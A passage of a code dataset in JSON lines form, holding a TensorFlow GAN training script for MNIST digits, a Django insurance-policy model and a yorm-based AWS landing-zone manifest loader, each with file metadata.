traverse_bfs(words_graph, start_word, end_word)\n\nif __name__ == '__main__':\n main()\n", "sub_path": "alg_word_ladder_bfs.py", "file_name": "alg_word_ladder_bfs.py", "file_ext": "py", "file_size_in_byte": 1639, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "collections.defaultdict", "line_number": 22, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 23, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 39, "usage_type": "call"}, {"api_name": "alg_breadth_first_search.traverse_bfs", "line_number": 56, "usage_type": "call"}]}
+{"seq_id": "361426168", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 21 14:24:15 2017\n\n@author: SalaFeng-\n\"\"\"\n\nimport tensorflow as tf\nimport numpy as np\nfrom skimage.io import imsave\nimport os\nfrom tensorflow.examples.tutorials.mnist import input_data\nbatch_size =256\nmax_epoch =500\nimg_size =28 *28\nz_size =100\nh1_size =150\nh2_size =300\ndef build_generator(Z):\n w1 =tf.Variable(tf.truncated_normal([z_size,h1_size],stddev=0.1),name=\"g_w1\",dtype=tf.float32)\n b1 =tf.Variable(tf.zeros([h1_size]),name=\"g_b1\",dtype=tf.float32)\n h1 =tf.nn.relu(tf.matmul(Z,w1) +b1)\n w2 =tf.Variable(tf.truncated_normal([h1_size,h2_size],stddev=0.1),name=\"g_w2\",dtype=tf.float32)\n b2 =tf.Variable(tf.zeros([h2_size]), name=\"g_b2\", dtype=tf.float32)\n h2 =tf.nn.relu(tf.matmul(h1, w2) + b2)\n w3 =tf.Variable(tf.truncated_normal([h2_size,img_size],stddev=0.1),name=\"g_w3\",dtype =tf.float32)\n b3 =tf.Variable(tf.zeros([img_size]),name=\"g_b3\",dtype=tf.float32)\n h3 =tf.matmul(h2,w3)+b3\n x_generate = tf.nn.tanh(h3)\n g_params =[w1,b1,w2,b2,w3,b3]\n return x_generate,g_params\n \ndef build_discriminator(x_data,x_generator,keep_prob):\n x_in =tf.concat([x_data,x_generator],0)\n w1 = tf.Variable(tf.truncated_normal([img_size, h2_size], stddev=0.1), name=\"d_w1\", dtype=tf.float32)\n b1 = tf.Variable(tf.zeros([h2_size]), name=\"d_b1\", dtype=tf.float32)\n h1 = tf.nn.dropout(tf.nn.relu(tf.matmul(x_in, w1) + b1), keep_prob)\n w2 = tf.Variable(tf.truncated_normal([h2_size, h1_size], stddev=0.1), name=\"d_w2\", dtype=tf.float32)\n b2 = tf.Variable(tf.zeros([h1_size]), name=\"d_b2\", dtype=tf.float32)\n h2 = tf.nn.dropout(tf.nn.relu(tf.matmul(h1, w2) + b2), keep_prob)\n w3 = tf.Variable(tf.truncated_normal([h1_size, 1], stddev=0.1), name=\"d_w3\", dtype=tf.float32)\n b3 = tf.Variable(tf.zeros([1]), name=\"d_b3\", dtype=tf.float32)\n h3 = tf.matmul(h2, w3) + b3\n y_data =tf.nn.sigmoid(tf.slice(h3,[0,0],[batch_size,-1],name =None))\n y_generated = tf.nn.sigmoid(tf.slice(h3, [batch_size, 0], [-1, -1], name=None))\n d_params = [w1, b1, w2, b2, w3, b3]\n return y_data, y_generated, d_params\n\ndef show_result(batch_res, fname, grid_size=(8, 8), grid_pad=5):\n batch_res = 0.5 * batch_res.reshape((batch_res.shape[0], 28, 28)) + 0.5\n img_h, img_w = batch_res.shape[1], batch_res.shape[2]\n grid_h = img_h * grid_size[0] + grid_pad * (grid_size[0] - 1)\n grid_w = img_w * grid_size[1] + grid_pad * (grid_size[1] - 1)\n img_grid = np.zeros((grid_h, grid_w), dtype=np.uint8)\n for i, res in enumerate(batch_res):\n if i >= grid_size[0] * grid_size[1]:\n break\n img = (res) * 255\n img = img.astype(np.uint8)\n row = (i // grid_size[0]) * (img_h + grid_pad)\n col = (i % grid_size[1]) * (img_w + grid_pad)\n img_grid[row:row + img_h, col:col + img_w] = img\n imsave(fname, img_grid)\n\n \ndef train():\n OptimizerName =\"SGD_expenential_decay_rl\"\n init_learning_rate =0.005 \n \n mnist = input_data.read_data_sets('MNIST_data', one_hot=True)\n x_data =tf.placeholder(tf.float32,[batch_size,img_size],name =\"x_data\")\n Z =tf.placeholder(tf.float32,[batch_size,z_size],name =\"Z\")\n keep_prob =tf.placeholder(tf.float32,name =\"keep_prob\")\n global_step =tf.Variable(0,name=\"global_step\",trainable=False)\n \n x_generated,g_params =build_generator(Z)\n y_data, y_generated, d_params = build_discriminator(x_data, x_generated, keep_prob)\n \n d_loss = -tf.reduce_mean(tf.log(y_data) +tf.log(1-y_generated))\n g_loss = -tf.reduce_mean(tf.log(y_generated))\n \n \n\n if OptimizerName ==\"momentum\":\n momentum = 
0.9\n optimizer =tf.train.MomentumOptimizer(init_learning_rate,momentum)\n elif OptimizerName == \"Adam\" :\n optimizer=tf.train.AdamOptimizer(init_learning_rate, beta1=0.9, beta2=0.999)\n \n elif OptimizerName ==\"SGD_expenential_decay_rl\":\n learning_rate=tf.train.exponential_decay(init_learning_rate,global_step,50,0.95,staircase=True)\n optimizer=tf.train.GradientDescentOptimizer(learning_rate)\n elif OptimizerName ==\"Adagrad\":\n optimizer =tf.train.AdagradOptimizer(init_learning_rate)\n else: #如果都不是 就用SGD\n optimizer=tf.train.GradientDescentOptimizer(init_learning_rate)\n \n \n d_trainer = optimizer.minimize(d_loss, var_list=d_params)\n g_trainer = optimizer.minimize(g_loss, var_list=g_params)\n #初始化\n init = tf.global_variables_initializer()\n sess = tf.Session()\n sess.run(init)\n \n z_sample_val = np.random.normal(0, 1, size=(batch_size, z_size)).astype(np.float32)\n \n steps = 50000 // batch_size\n for i in range(sess.run(global_step),max_epoch):\n for j in range(steps):\n x_value, _ = mnist.train.next_batch(batch_size)\n x_value = 2 * x_value.astype(np.float32) - 1\n z_value = np.random.normal(0, 1, size=(batch_size, z_size)).astype(np.float32)\n _,D_loss_curr=sess.run([d_trainer,d_loss],feed_dict ={x_data:x_value,Z:z_value,keep_prob: np.sum(0.7).astype(np.float32)})\n _,G_loss_curr=sess.run([g_trainer,g_loss],feed_dict={x_data: x_value,Z:z_value,keep_prob: np.sum(0.7).astype(np.float32)}) \n print('Epoch :{} D_loss:{:0.4f} G_loss:{:0.4f}'.format(i,D_loss_curr,G_loss_curr))\n x_gen_val = sess.run(x_generated, feed_dict={Z: z_sample_val})\n path =\"output/{}_{}\".format(OptimizerName,init_learning_rate)\n if not os.path.exists(path):\n os.mkdir(path)\n print(\"makedir----->{}\".format(path))\n #show_result(x_gen_val, \"{}/{}_{:0.5f}.jpg\".format(path,i,sess.run(learning_rate)))\n show_result(x_gen_val, \"{}/{}.jpg\".format(path,i))\n z_random_sample_val = np.random.normal(0, 1, size=(batch_size, z_size)).astype(np.float32)\n x_gen_val = sess.run(x_generated, feed_dict={Z: z_random_sample_val})\n #show_result(x_gen_val, \"output/out_lr={}_momentum={}/random_sample{}.jpg\".format(learning_rate,momentum,i))\n sess.run(tf.assign(global_step, i + 1))\ntrain() \n \n \n ", "sub_path": "gan_多层感知机.py", "file_name": "gan_多层感知机.py", "file_ext": "py", "file_size_in_byte": 6081, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "tensorflow.Variable", "line_number": 20, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 20, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 20, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 21, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 21, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 21, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 22, "usage_type": "attribute"}, {"api_name": "tensorflow.matmul", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 23, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 24, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 24, "usage_type": "call"}, {"api_name": 
"tensorflow.float32", "line_number": 24, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 25, "usage_type": "attribute"}, {"api_name": "tensorflow.matmul", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 26, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 27, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 27, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 27, "usage_type": "attribute"}, {"api_name": "tensorflow.matmul", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.nn.tanh", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 29, "usage_type": "attribute"}, {"api_name": "tensorflow.concat", "line_number": 34, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 36, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.dropout", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 37, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 38, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 38, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 38, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 39, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 39, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 39, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.dropout", "line_number": 40, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 40, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 40, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 40, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 41, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 41, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 41, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 42, "usage_type": "attribute"}, {"api_name": "tensorflow.matmul", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.nn.sigmoid", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tensorflow.slice", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.nn.sigmoid", "line_number": 45, "usage_type": "call"}, {"api_name": 
"tensorflow.nn", "line_number": 45, "usage_type": "attribute"}, {"api_name": "tensorflow.slice", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 59, "usage_type": "attribute"}, {"api_name": "skimage.io.imsave", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.examples.tutorials.mnist.input_data.read_data_sets", "line_number": 70, "usage_type": "call"}, {"api_name": "tensorflow.examples.tutorials.mnist.input_data", "line_number": 70, "usage_type": "name"}, {"api_name": "tensorflow.placeholder", "line_number": 71, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 71, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 72, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 72, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 73, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 73, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 74, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow.log", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 80, "usage_type": "call"}, {"api_name": "tensorflow.log", "line_number": 80, "usage_type": "call"}, {"api_name": "tensorflow.train.MomentumOptimizer", "line_number": 86, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 86, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.train.exponential_decay", "line_number": 91, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 91, "usage_type": "attribute"}, {"api_name": "tensorflow.train.GradientDescentOptimizer", "line_number": 92, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 92, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdagradOptimizer", "line_number": 94, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 94, "usage_type": "attribute"}, {"api_name": "tensorflow.train.GradientDescentOptimizer", "line_number": 96, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 96, "usage_type": "attribute"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 102, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 106, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 106, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 112, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 113, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 113, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 114, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.float32", 
"line_number": 115, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 119, "usage_type": "call"}, {"api_name": "os.path", "line_number": 119, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 124, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 124, "usage_type": "attribute"}, {"api_name": "tensorflow.assign", "line_number": 127, "usage_type": "call"}]}
+{"seq_id": "53777739", "text": "from django.db import models\nfrom django.conf import settings\n\n# Create your models here.\n\ndef file_name(instance, filename):\n return 'files/{0}/{1}'.format(instance.user.id, filename)\n\nclass Policy(models.Model):\n FREQ_CHOICES = (\n ('monthly', 'monthly'),\n ('weekly', 'weekly'),\n ('quarterly', 'quarterly'),\n ('annually', 'annually'),\n )\n\n owner = models.ForeignKey(settings.AUTH_USER_MODEL)\n carrier_name = models.CharField(max_length=100)\n policy_number = models.IntegerField(primary_key=True)\n start_date = models.DateTimeField(blank=True,null=True)\n end_date = models.DateTimeField(blank=True, null=True)\n cust_serv_number = models.IntegerField(blank=True, null=True)\n cust_serv_email = models.EmailField(blank=True, null=True)\n premium = models.DecimalField(max_digits=10,decimal_places=2,blank=True, null=True)\n frequency = models.CharField(max_length=20, choices=FREQ_CHOICES, blank=True, null=True)\n pdf=models.FileField(upload_to=file_name, blank=True, null=True)\n\n class Meta:\n unique_together = ((\"carrier_name\", \"policy_number\"),)\n\n def save_policy(self):\n self.save()\n\n def __str__(self):\n return str(self.policy_number)\n", "sub_path": "policies/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 1232, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "django.db.models.Model", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 9, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 17, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.models.EmailField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": "django.db.models.DecimalField", "line_number": 24, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 24, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 25, "usage_type": "name"}, {"api_name": "django.db.models.FileField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 26, "usage_type": "name"}]}
+{"seq_id": "196473445", "text": "import yorm\nfrom yorm.types import String, Integer, Float, Boolean\nfrom yorm.types import List, Dictionary, AttributeDictionary\n\n@yorm.attr(name=String)\n@yorm.attr(value=String)\nclass SSM(AttributeDictionary):\n def __init__(self, name, value):\n super().__init__()\n self.name = name\n self.value = value\n\n@yorm.attr(all=SSM)\nclass SSMList(List):\n def __init__(self):\n super().__init__()\n\n@yorm.attr(all=String)\nclass RegionsList(List):\n def __init__(self):\n super().__init__()\n\n@yorm.attr(all=String)\nclass dependsOnList(List):\n def __init__(self):\n super().__init__()\n\n@yorm.attr(all=String)\nclass BaselineProductsList(List):\n def __init__(self):\n super().__init__()\n\n@yorm.attr(all=String)\nclass ApplyToOUList(List):\n def __init__(self):\n super().__init__()\n\n\n@yorm.attr(name=String)\n@yorm.attr(template_file=String)\n@yorm.attr(parameter_file=String)\n@yorm.attr(deploy_method=String)\n@yorm.attr(ssm_parameters=SSMList)\n@yorm.attr(regions=RegionsList)\n@yorm.attr(parameter_override=String)\n@yorm.attr(baseline_products=BaselineProductsList)\n@yorm.attr(depends_on=dependsOnList)\nclass Resource(AttributeDictionary):\n def __init__(self, name, template_file, parameter_file, deploy_method, parameter_override, baseline_products, regions, ssm_parameters, depends_on):\n super().__init__()\n self.name = name\n self.template_file = template_file\n self.parameter_file = parameter_file\n self.deploy_method = deploy_method\n self.baseline_products = []\n self.regions = []\n self.ssm_parameters = []\n self.depends_on = []\n self.parameter_override = parameter_override\n\n\n@yorm.attr(all=Resource)\nclass ResourcesList(List):\n def __init__(self):\n super().__init__()\n\n\n@yorm.attr(name=String)\n@yorm.attr(email=String)\n@yorm.attr(ssm_parameters=SSMList)\n@yorm.attr(core_resources=ResourcesList)\nclass Account(AttributeDictionary):\n def __init__(self, name, email, ssm_parameters, core_resources):\n super().__init__()\n self.name = name\n self.email = email\n self.ssm_parameters = []\n self.core_resources = []\n\n\n@yorm.attr(all=Account)\nclass AccList(List):\n def __init__(self):\n super().__init__()\n\n\n@yorm.attr(name=String)\n@yorm.attr(core_accounts=AccList)\n@yorm.attr(include_in_baseline_products=BaselineProductsList)\nclass OrganizationalUnit(AttributeDictionary):\n def __init__(self, name, include_in_baseline_products, core_accounts):\n super().__init__()\n self.name = name\n self.include_in_baseline_products = []\n self.core_accounts = []\n\n\n@yorm.attr(all=OrganizationalUnit)\nclass OUList(List):\n def __init__(self):\n super().__init__()\n\n\n@yorm.attr(name=String)\n@yorm.attr(description=String)\n@yorm.attr(template_file=String)\n@yorm.attr(skeleton_file=String)\n@yorm.attr(rules_file=String)\n@yorm.attr(parameter_file=String)\n@yorm.attr(ssm_parameters=SSMList)\n@yorm.attr(hide_old_versions=Boolean)\n@yorm.attr(apply_baseline_to_accounts_in_ou=ApplyToOUList)\n@yorm.attr(launch_constraint_role=String)\n@yorm.attr(product_type=String)\nclass Product(AttributeDictionary):\n def __init__(self, name, description, template_file, skeleton_file, rules_file, parameter_file, hide_old_versions, apply_baseline_to_accounts_in_ou, launch_constraint_role, product_type, ssm_parameters):\n super().__init__()\n self.name = name\n self.description = description\n self.template_file = template_file\n self.skeleton_file = skeleton_file\n self.rules_file = rules_file\n self.parameter_file = parameter_file\n self.ssm_parameters = []\n 
self.hide_old_versions = hide_old_versions\n self.apply_baseline_to_accounts_in_ou = apply_baseline_to_accounts_in_ou\n self.launch_constraint_role = launch_constraint_role\n self.product_type = product_type\n\n\n@yorm.attr(all=Product)\nclass ProductsList(List):\n def __init__(self):\n super().__init__()\n\n\n@yorm.attr(name=String)\n@yorm.attr(description=String)\n@yorm.attr(owner=String)\n@yorm.attr(products=ProductsList)\n@yorm.attr(principal_role=String)\nclass Portfolio(AttributeDictionary):\n def __init__(self, name, description, owner, principal_role, products):\n super().__init__()\n self.name = name\n self.description = description\n self.owner = owner\n self.products = []\n self.principal_role = principal_role\n\n\n@yorm.attr(all=Portfolio)\nclass PortfoliosList(List):\n def __init__(self):\n super().__init__()\n\n\n@yorm.attr(name=String)\n@yorm.attr(policy_file=String)\n@yorm.attr(description=String)\n@yorm.attr(apply_to_accounts_in_ou=ApplyToOUList)\nclass Policy(AttributeDictionary):\n def __init__(self, name, policy_file, description, apply_to_accounts_in_ou):\n super().__init__()\n self.name = name\n self.description = description\n self.policy_file = policy_file\n self.apply_to_accounts_in_ou = apply_to_accounts_in_ou\n\n\n@yorm.attr(all=Policy)\nclass PolicyList(List):\n def __init__(self):\n super().__init__()\n\n\n@yorm.attr(region=String)\n@yorm.attr(version=String)\n@yorm.attr(lock_down_stack_sets_role=Boolean)\n@yorm.attr(organizational_units=OUList)\n@yorm.attr(portfolios=PortfoliosList)\n@yorm.attr(baseline_resources=ResourcesList)\n@yorm.attr(organization_policies=PolicyList)\n@yorm.sync(\"{self.manifest_file}\", auto_create=False)\nclass Manifest:\n def __init__(self, manifest_file):\n self.manifest_file = manifest_file\n self.organizational_units = []\n self.organization_policies = []\n self.portfolios = []\n self.baseline_resources = []\n\n\n\nif __name__ == \"__main__\":\n manifest = Manifest('../../deployment/aws_landing_zone_framework/manifest.yaml')\n\n # print(manifest.organizational_units)\n # if manifest.organizational_units:\n # for ou in manifest.organizational_units:\n # for account in ou.accounts:\n # for resource in account.resources:\n # print(resource.name)\n # print(resource.template_file)\n # print(resource.parameter_file)\n # print(resource.deploy_method)\n # print(resource.regions)\n # else:\n # print(\"No OUs to process\")\n #\n for port in manifest.portfolios:\n print(port.name)\n print(port.principal_role)\n for prod in port.products:\n print(prod.name)\n print(prod.hide_old_versions)\n if len(prod.skeleton_file) > 0:\n print(\"template={}\".format(prod.skeleton_file))\n if len(prod.template_file) > 0:\n print(\"template={}\".format(prod.template_file))\n print(prod.product_type)\n print(prod.apply_baseline_to_accounts_in_ou)\n", "sub_path": "v2.0.1/aws-landing-zone-launch-avm/lib/manifest.py", "file_name": "manifest.py", "file_ext": "py", "file_size_in_byte": 6862, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "yorm.types.AttributeDictionary", "line_number": 7, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 5, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 5, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 6, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 6, "usage_type": "name"}, {"api_name": "yorm.types.List", "line_number": 14, "usage_type": "name"}, {"api_name": "yorm.attr", 
"line_number": 13, "usage_type": "call"}, {"api_name": "yorm.types.List", "line_number": 19, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 18, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 18, "usage_type": "name"}, {"api_name": "yorm.types.List", "line_number": 24, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 23, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 23, "usage_type": "name"}, {"api_name": "yorm.types.List", "line_number": 29, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 28, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 28, "usage_type": "name"}, {"api_name": "yorm.types.List", "line_number": 34, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 33, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 33, "usage_type": "name"}, {"api_name": "yorm.types.AttributeDictionary", "line_number": 48, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 39, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 39, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 40, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 40, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 41, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 41, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 42, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 42, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 43, "usage_type": "call"}, {"api_name": "yorm.attr", "line_number": 44, "usage_type": "call"}, {"api_name": "yorm.attr", "line_number": 45, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 45, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 46, "usage_type": "call"}, {"api_name": "yorm.attr", "line_number": 47, "usage_type": "call"}, {"api_name": "yorm.types.List", "line_number": 63, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 62, "usage_type": "call"}, {"api_name": "yorm.types.AttributeDictionary", "line_number": 72, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 68, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 68, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 69, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 69, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 70, "usage_type": "call"}, {"api_name": "yorm.attr", "line_number": 71, "usage_type": "call"}, {"api_name": "yorm.types.List", "line_number": 82, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 81, "usage_type": "call"}, {"api_name": "yorm.types.AttributeDictionary", "line_number": 90, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 87, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 87, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 88, "usage_type": "call"}, {"api_name": "yorm.attr", "line_number": 89, "usage_type": "call"}, {"api_name": "yorm.types.List", "line_number": 99, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 98, "usage_type": "call"}, {"api_name": "yorm.types.AttributeDictionary", "line_number": 115, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 104, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 104, "usage_type": "name"}, {"api_name": 
"yorm.attr", "line_number": 105, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 105, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 106, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 106, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 107, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 107, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 108, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 108, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 109, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 109, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 110, "usage_type": "call"}, {"api_name": "yorm.attr", "line_number": 111, "usage_type": "call"}, {"api_name": "yorm.types.Boolean", "line_number": 111, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 112, "usage_type": "call"}, {"api_name": "yorm.attr", "line_number": 113, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 113, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 114, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 114, "usage_type": "name"}, {"api_name": "yorm.types.List", "line_number": 132, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 131, "usage_type": "call"}, {"api_name": "yorm.types.AttributeDictionary", "line_number": 142, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 137, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 137, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 138, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 138, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 139, 